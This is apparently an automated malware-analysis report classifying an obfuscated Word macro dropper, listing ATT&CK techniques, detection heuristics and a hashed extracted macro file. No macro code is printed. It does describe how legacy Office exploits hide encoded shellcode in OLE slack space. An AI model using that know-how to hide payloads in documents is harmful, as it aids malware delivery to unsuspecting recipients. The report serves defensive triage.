Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The critical ClamAV detection and medium heuristic for VBA macros indicate a malicious dropper. The VBA macros are heavily obfuscated, but their structure suggests they are designed to download and execute a second-stage payload. The legacy WordBasic AutoOpen marker also points to an older infection vector, likely spearphishing.
Heuristics (5)

- ClamAV: Doc.Dropper.Agent-7551741-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-7551741-0.
- OLE document has large unaccounted-for region [high, OLE_SLACK_ANOMALY]: OLE file is 81,152 bytes but its declared streams total only 39,403 bytes; 41,749 bytes (51%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- VBA macros detected [medium, OLE_VBA_MACROS]: Document contains VBA macro code.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9496 bytes |

SHA-256 (macros.bas): 14e55f5af7fb2f81dc5a36d2af45ff6a50c7c9602ebc7f433cc19bb4afda363d
Script preview: first 1,000 lines of the extracted script.